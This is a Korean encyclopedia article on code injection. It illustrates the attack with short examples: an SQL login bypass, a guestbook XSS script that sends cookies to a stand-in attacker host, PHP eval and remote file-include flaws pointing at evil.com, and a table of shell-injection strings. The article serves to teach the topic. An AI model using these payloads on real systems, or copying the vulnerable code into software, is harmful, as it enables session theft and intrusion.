Loading AI tools
위키백과, 무료 백과사전
코드 인젝션(영어: Code injection)은 유효하지 않은 데이터를 실행함으로써 야기되는 소프트웨어 버그의 부당한 사용이다. 삽입은 공격자에 의해서 취약한 컴퓨터 프로그램 코드를 삽입하고 실행을 변경하는 방식으로 이용된다. 성공적인 코드 인젝션은 이것을 이용한 웜의 전파 같이 종종 처참한 결과를 보여준다.
삽입 취약점은 애플리케이션이 인터프리터에 신뢰할 수 없는 데이터를 보낼 때 발생한다. 삽입 취약점은 매우 일반적이며 특히 낡은 코드에서 그렇다. 이것들은 주로 SQL, LDAP, Xpath, 또는 NoSQL 쿼리들(OS 명령어; XML 파서, SMTP 헤더, 인수 등)에서 발견된다. 삽입 취약점은 코드 검사 때에는 발견하기 쉽지만, 테스트 시에는 발견하기 어려운 경우가 많다. 취약점 스캐너와 퍼저들은 공격자가 삽입 취약점을 찾는 것을 도와준다.[1]
삽입은 데이터 손실이나 오염, 책임의 부족 또는 DoS를 야기한다. 또한 가끔은 완전한 호스트 접수로 이어질 수 있다.
특정한 종류의 코드 인젝션은 단지 유저 입력에 특별한 의미를 주는, 해석에서의 오류이다. 몇몇 종류의 코드 인젝션에서는 사용자 입력과 시스템 명령의 구분에 대한 실패가 존재한다.
코드 인젝션은 해킹이나 크래킹에서 정보를 얻거나 권한 확대 또는 비인가 접근을 위한 인기있는 개념이다. 코드 인젝션은 아래와 같은 많은 악의적인 목적으로 사용될 수 있다.
몇몇 사람들은 코드 인젝션을 좋은 의도로 사용하기도 한다. 예를 들면, 프로그램의 동작을 변경해서 악의적인 목적 없이 장난을 칠 수 있다.
하지만 이 또한 법적으로 문제를 야기할 수 있으며, 의도치 않은 코드인젝션은 어떠한 경우에도 불법임을 인지해야 한다.
코드 인젝션 문제를 예방하기 위하여, 아래와 같은 안전한 입출력 처리를 활용한다.
위에 목록화된 해결법들은 주로 웹 관련된 것들을 다룬다. 그러나 사용자 머신에의 사용자 코드 인젝션 같은 접근들도 생각해봐야 한다. 관리되거나 관리되고 있지 않은 코드 인젝션을 탐지하고 분리하는 접근으로는 아래와 같다.
SQL 인젝션은 SQL의 문법을 이용해 데이터베이스의 데이터를 읽거나 수정 또는 원래 쿼리의 의미를 손상시킬 수 있다.
예를 들어서 사용자에게 name과 password라는 두 필드를 입력하게 허용하는 웹 페이지가 있다. 실제 코드는 name과 password를 확인하기 위한 SQL 쿼리를 생성할 것이다.
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'Password'
이 쿼리에 문제가 없다면 접근은 허용된다. 그러나 악의적인 사용자는 "password' OR '1'='1"
와 같은 유효한 코드를 추가해서 다음과 같이 보이게 한다.
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'password' OR '1'='1'
위의 예를 보면 "'1'='1'
"는 항상 참이기 때문에 접근은 허용된다.
이 기법은 실행할 또는 외부 프로그램을 로드하고 실행할 수 있게 여러 선언들로 바꿀 수 있다.
웹 서버는 게스트북 스크립트를 가지는데, 이것은 아래와 같은 메시지를 받는다.
Very nice site!
그러나 악의적인 사용자의 게스트북의 코드 인젝션 취약점을 알고 다음과 같은 메시지를 작성할 것이다.
Nice site, I think I'll take it. <script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>
만약 다른 사용자가 이 페이지를 보면 삽입된 코드가 실행될 것이다. 이 코드는 공격자가 다른 사용자인것처럼 가장할 수 있다. 그러나 같은 소프트웨어 버그가 우연히 발생할 수 있는데, 아래와 같은 안좋은 HTML 코드가 그것이다.
That post was awesome, >:)
HTML/스크립트 삽입은 인기있는 분야이며 "Cross-Site Scripting", 또는 "XSS"로 불린다.
eval 삽입 취약점은 eval()
함수로 들어가는 문자열 입력을 공격자가 제어할 수 있을 때 발생한다.[3]
$myvar = 'somevalue';
$x = $_GET['arg'];
eval('$myvar = ' . $x . ';');
"eval
"의 인자는 PHP에서 실행되므로 추가적인 명령어가 첨부될 수 있다. 예를 들면 "arg"는 "10; system('/bin/echo uh-oh')
"로 세팅될 수 있고, 이 경우 이 프로그램을 실행하는 서버는 "/bin/echo
"를 실행하게 된다.
PHP는 객체의 직렬화와 역직렬화를 허용한다. 만약 신뢰되지 않은 입력이 역질렬화 함수에 허용된다면, 악의적인 공격이 가능해진다.[4]
PHP 프로그램을 가정하자.
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
이 예시는 단지 blue.php나 red.php 같은 색상 파일들로 여겨지지만, 공격자가 COLOR=http://evil.com/exploit를 작성할 시에는 PHP가 외부 파일을 로드하게 된다.
셸 삽입은 유닉스 셸의 이름을 땄지만 소프트웨어가 명령 줄 인터페이스를 실행하는 것을 허용한 대부분의 시스템에도 적용될 수 있다. 관련된 함수로는 system()
, StartProcess()
, 그리고 System.
Diagnostics.Process.
Start()
가 있다.
아래의 짧은 PHP 프로그램을 보자. 이것은 funnytext
라는 외부 프로그램을 실행한다.
<?php
passthru("/bin/funnytext " . $_GET['USER_INPUT']);
?>
이 프로그램은 다양한 방식으로 삽입 취약점을 사용할 수 있다.
셸 특징 | USER_INPUT 값 |
셸 명령어의 결과 | 예시 |
---|---|---|---|
Sequential execution | ; malicious_command |
/bin/funnytext ; malicious_command |
Executes funnytext , then executes malicious_command . |
Pipelines | | malicious_command |
/bin/funnytext | malicious_command |
Sends the output of funnytext as input to malicious_command . |
Command substitution | `malicious_command` |
/bin/funnytext `malicious_command` |
Sends the output of malicious_command as arguments to funnytext . |
Command substitution | $(malicious_command) |
/bin/funnytext $(malicious_command) |
Sends the output of malicious_command as arguments to funnytext . |
AND list | && malicious_command |
/bin/funnytext && malicious_command |
Executes malicious_command iff funnytext returns an exit status of 0 (success). |
OR list | || malicious_command |
/bin/funnytext || malicious_command |
Executes malicious_command iff funnytext returns a nonzero exit status (error). |
Output redirection | > ~/.bashrc |
/bin/funnytext > ~/.bashrc |
Overwrites the contents the .bashrc file with the output of funnytext . |
Input redirection | < ~/.bashrc |
/bin/funnytext < ~/.bashrc |
Sends the contents of the .bashrc file as input to funnytext . |
Seamless Wikipedia browsing. On steroids.
Every time you click a link to Wikipedia, Wiktionary or Wikiquote in your browser's search results, it will show the modern Wikiwand interface.
Wikiwand extension is a five stars, simple, with minimum permission required to keep your browsing private, safe and transparent.